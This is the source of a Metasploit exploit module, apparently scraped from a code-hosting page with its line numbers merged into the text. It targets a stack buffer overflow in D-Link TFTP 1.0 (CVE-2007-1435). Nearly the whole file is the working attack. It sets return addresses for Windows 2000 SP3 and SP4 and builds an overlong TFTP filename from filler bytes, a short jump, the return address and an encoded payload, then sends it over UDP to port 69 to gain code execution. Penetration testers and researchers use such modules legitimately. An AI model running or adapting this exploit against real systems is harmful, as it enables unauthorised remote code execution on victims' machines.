Path: blob/master/modules/exploits/windows/tftp/dlink_long_filename.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Udp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in D-Link TFTP 1.0.17By sending a request for an overly long file name, an attacker18could overflow a buffer and execute arbitrary code. For best results,19use bind payloads with nonx (No NX).20},21'Author' => [22'LSO <lso[at]hushmail.com>', # Exploit module23'aushack', # Refs, stability, targets etc24],25'References' => [26[ 'CVE', '2007-1435' ],27[ 'OSVDB', '33977' ],28[ 'BID', '22923' ],29],30'DefaultOptions' => {31'EXITFUNC' => 'process',32},33'Payload' => {34'Space' => 1024,35'BadChars' => "\x00",36'Compat' =>37{38'ConnectionType' => '-reverse',39},40},41'SaveRegisters' => [ 'ecx', 'eax', 'esi' ],42'Platform' => 'win',4344'Targets' => [45# Patrick tested OK 2009022846['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx47['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx48],49'Privileged' => false,50'DisclosureDate' => '2007-03-12',51'DefaultTarget' => 0,52'Notes' => {53'Reliability' => UNKNOWN_RELIABILITY,54'Stability' => UNKNOWN_STABILITY,55'SideEffects' => UNKNOWN_SIDE_EFFECTS56}57)58)5960register_options(61[62Opt::RPORT(69)63], self64)65end6667def exploit68connect_udp6970print_status("Trying target #{target.name}...")7172juju = "\x00\x01"73juju << Rex::Text.rand_text_alpha_upper(581)74juju << Rex::Arch::X86.jmp_short(42)75juju << Rex::Text.rand_text_alpha_upper(38)76juju << [target.ret].pack('V') + payload.encoded7778udp_sock.put(juju)7980handler81disconnect_udp82end83end848586